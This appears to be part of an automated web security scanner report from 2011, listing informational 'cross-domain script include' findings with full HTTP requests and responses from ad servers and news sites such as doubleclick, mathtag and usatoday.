GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=88105499721132220&clkurl=http://ib.adnxs.com/click/mpmZmZmZ-T-amZmZmZn5PwAAAAAAAAxAAAAAAAAADEAAAAAAAAAMQODGbwg69CFkSsYda6b2ziWrCchNAAAAAC4hAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gB3C04AEA8BAgUCAAQAAAAAfxzeJwAAAAA./cnd=!eRMkCwj25QIQx8kKGAAg0ccBKE4xAAAAAAAADEBCEwgAEAAYACABKP7__________wFIAFAAWPcWYABolgU./referrer=http%3A%2F%2Fwww.csmonitor.com%2FBusiness/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBAFOqqwnITbTYJoX0lAf-jfHKCdfq-NMBl6GU7BjZ59HSHwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHD8v3sA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc5gCwAzAAgTIAoXSzwrgAgDqAhAzMDB4MjUwQ19HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtygYYY1WjNaewxmNUetXvrYk6kjZg%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUaGIdSlqXB8gTNDuT_OL7eWkwL7QDA3gBY2BgEGFgWnCTgSW7jYGR9zsDww0XBgYGTgYGRv0j_xZYQeVagXI_gHKuMLlNHp0ZuPRtvBk3GSrXAtT3E6jPDaZvo_lNE5z6zNP1cctJMDAwdS4BurMZaOYvoJnuMDMn6Uf4Q.Uw3NnLsc0bKofhll4Ol35cch3ZMadwyiW5XccpF.F1Daec34QQnHKuDRxQOYx46JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgETDcGXHKV3YLAeUZfI_rNYBSUeAtRkFGYHraycgPpBgMeJgZWZnZ.NkZORg5GbkYuRl5GHkZ.cCSLJmMIkA1SwvAOhTMIIIhTCKMokBh.V1cbMzYtC12ZwQ6B5hcL7nWCoCsZmAAAFGskws-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUVGIL2vn32CiWPiwQj5OTzmIjggADA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2rqR9VoXJtQLnvQDkXmNyRfwuscOnb5NGZgUvfxptxk6FyLUAzfwLNdIOZudH8pglOfebp.rjlJBgYmDqXAP3QDDTzF9BMd5iZk_Qj_KFyGP7r5djmDZXDcEsvh0s_LrmO7JhTOOWS3K7jlIvwuoZTzm9CCE451wYOqBxGPHRIuN_GqU_CThuXvvaTOzfh0td.ckYtTrkTwouBYcuIU76yWwgoz.B7XK8BlIoCbzEKMgLT005GfiDFYMDHwMjMyMLEys_GyM7IwcjJyMXIzcjDyMvIB1bAkskoAlS3tACsS8EMIhjCJMIoChSW38XNyoRd42J3RqCjYIkW5AIGAPYfk5A-; Domain=.amgdgt.com; Expires=Wed, 08-Jun-2011 15:35:18 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3928
Date: Mon, 09 May 2011 15:35:17 GMT

_289669_amg_acamp_id=172249;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732017/direct/01/rnd=1875839577?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUNRNOhbAPD5FIvSW2ZNjj_EMWeQlnZW8sdXNhLHQsMTMwNDk1NTMxODU2NSxjLDI4OTY2OSxwYyw2OTExMixhYywxNzIyNDksbyxOMC1TMCxsLDU1MzY1LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL21wbVptWm1aLVQtYW1abVptWm41UHdBQUFBQUFBQXhBQUFBQUFBQUFERUFBQUFBQUFBQU1RT0RHYndnNjlDRmtTc1lkYTZiMnppV3JDY2hOQUFBQUFDNGhBQUMxQUFBQWxnSUFBQUlBQUFESHBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0IzQzA0QUVBOEJBZ1VDQUFRQUFBQUFmeHplSndBQUFBQS4vY25kPSFlUk1rQ3dqMjVRSVF4OGtLR0FBZzBjY0JLRTR4QUFBQUFBQUFERUJDRXdnQUVBQVlBQ0FCS1A3X19fX19fX19fX3dGSUFGQUFXUGNXWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNzL2NsaWNrZW5jPWh0dHA6Ly9hZGNsaWNrLmcuZG91YmxlY2xpY2submV0L2FjbGs_c2E9bCZhaT1CQUZPcXF3bklUYlRZSm9YMGxBZi1qZkhLQ2RmcS1OTUJsNkdVN0JqWjU5SFNId0FRQVJnQklBQTRBVkNBeC1IRUJHREpob1dKaUtTRUVJSUJGMk5oTFhCMVlpMDJOelF6TmpJeU5USTFNakF5TlRjeW9BSEQ4djNzQTdJQkVYZDNkeTVqYzIxdmJtbDBiM0l1WTI5dHVnRUtNekF3ZURJMU1GOWhjOGdCQ2RvQklXaDBkSEE2THk5M2QzY3VZM050YjI1cGRHOXlMbU52YlM5Q2RYTnBibVZ6YzVnQ3dBekFBZ1RJQW9YU3p3cmdBZ0RxQWhBek1EQjRNalV3UTE5SFpXNWxjbUZzcUFNQjZBTnI2QU9UQmVnRG1BUG9BNHNKNkFPTUNmVURBZ1FBUlBVRElBQUFBT0FFQVlBRzZjU0Y5TVdRMW9reSZudW09MSZzaWc9QUdpV3F0eWdZWVkxV2pOYWV3eG1OVWV0WHZyWWs2a2paZyZjbGllbnQ9Y2EtcHViLTY3NDM2MjI1MjUyMDI1NzImYWR1cmw9Cg--/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69112&c5=172249&c6=&cv=1.3&cj=1&rn=1643675704" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

18.3. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7397
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:37:40 GMT
Expires: Mon, 09 May 2011 15:37:40 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Tue Mar 29 13:01:47 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

18.4. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7444
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:35:13 GMT
Expires: Mon, 09 May 2011 15:35:13 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Oct 27 10:20:44 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

18.5. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5834
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:36:17 GMT
Expires: Mon, 09 May 2011 15:36:17 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Mar 09 17:03:44 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

18.6. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82MDY0MzgzODQ4MjEwODI1OS8xMTI3MTEvMTAxNzc4LzQvX2ZrTzhjMkc0aHVUREhNaTB2REd4bUZyWW93T240Z0pWR3dZWGlIQ3JTby8/wx5pTXc5IEg4EhGauv_ZowQal6A&price=TcgKYwADH_oK5XtBnK9ekEmaWNoad9RlH1xSlQ&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBkRfnYwrITfq_DMH2lQeQvb3lCdzvj_EB-PbyvBGErMGhDwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHg6pnsA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBSWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzcy8yMDExLzA1MDkvR2FzLXByaWNlcy1zdGFydC10by1oZWFkLWRvd26YAugHwAIEyALWwYwO4AIA6gIQMzAweDI1MENfR2VuZXJhbKgDAegD9AnoA5MF6AORA_UDAAQARPUDIAAAAOAEAYAGgIqNvobDucuOAQ%26num%3D1%26sig%3DAGiWqtzdUBy3-sRSj_5-4w3QHutXcJep2g%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ts=1304949603; mt_mop=4:1304955375

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:46 GMT
Set-Cookie: mt_mop=4:1304955494; domain=.mathtag.com; path=/; expires=Thu, 08 May 2014 15:38:46 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Mon, 09 May 2011 15:38:11 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x6, ewr-bidder-x2
Server: MMBD/3.5.5
Content-Length: 999
Content-Type: text/html
Connection: keep-alive

<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2363415&PluID=0&w=300&h=250&ord=60643838482108259&ucm=true&ncu=$$http://pixel.mathtag.com/click/img?mt_aid=60643838482108259&mt_id=112711&mt_adid=100341&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.mediamath.com$$"></script>
...[SNIP]...

18.7. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304791875; ts=1304949603

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:16 GMT
Set-Cookie: mt_mop=4:1304955375; domain=.mathtag.com; path=/; expires=Thu, 08 May 2014 15:36:16 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Mon, 09 May 2011 15:36:12 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x6, ewr-bidder-x2
Server: MMBD/3.5.5
Content-Length: 1125
Content-Type: text/html
Connection: keep-alive

<IFRAME SRC="http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect="></SCRIPT>
...[SNIP]...

18.8. http://content.usatoday.com/topics/reporter/Doyle+Rice  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /topics/reporter/Doyle+Rice

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /topics/reporter/Doyle+Rice HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; s_ppv=24; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_sq=usatodayprod%2Cgntbcstglobal%3D%2526pid%253Dusat%252520%25253A%25252Fweather%25252Ffloods%25252F2011-05-02-ohio-mississippi-river-floods_n.htm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcontent.usatoday.com%25252Ftopics%25252Freporter%25252FDoyle%25252BRice%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:43:07 GMT
Content-Length: 63322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Topics Index Page - USATODAY.com</title>
<meta name="ROBOTS" cont
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2625"></script>
...[SNIP]...
</script>
<script src="http://jqueryui.com/ui/jquery.ui.widget.js"></script>
...[SNIP]...

18.9. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:03 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
